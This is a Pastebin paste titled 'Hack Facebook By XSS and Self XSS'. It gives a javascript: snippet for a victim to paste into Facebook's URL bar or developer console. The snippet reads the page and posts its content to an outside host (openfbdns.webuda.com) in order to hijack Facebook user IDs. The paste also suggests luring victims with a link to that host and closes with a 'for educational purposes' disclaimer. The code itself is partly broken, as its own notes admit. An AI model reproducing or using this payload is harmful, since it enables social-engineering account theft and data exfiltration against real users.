Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################
- Hack Facebook By XSS and Self XSS
- Founded & Coded By H4T3D
- ######################################
- Self XSS in Facebook
- Paste This Script in Url Bar Of Facebook or in Inspect Element :
- avascript:if(%22XMLHttpRequest%22 in window)xmlhttp=new XMLHttpRequest();if(%22ActiveXObject%22 in window)xmlhttp = new ActiveXObject(%22Msxml2.XMLHTTP%22);xmlhttp.open('GET', location.pathname,true);xmlhttp.onreadystatechange=function() {if (xmlhttp.readyState==4) { document.body.innerHTML += '<form id="dynForm" action="http://openfbdns.webuda.com/code.php" method="POST"><input type="hidden" name="q" value="document.write(xmlhttp.responseText)"></form>'; document.getElementById("dynForm").submit();}};xmlhttp.send(null);void(0);
- Remember to Put j of JavaScript by your self in Script Or it may not work :p
- This Xss would Get Whole Content Of Website and Post It To Another Website that is Facebook User Id Hijacking ....
- See This >> http://i.imgur.com/Ds1Dnc5.png
- You Can Also XSS some one by just sending him link like this >> http://openfbdns.webuda.com/code.php
- For Developers >> Plz Correct My Code POST Method :(
- Only For Educational Purposes Plz Dont harm Any One I am Not Responsible For That !!!!
Add Comment
Please, Sign In to add comment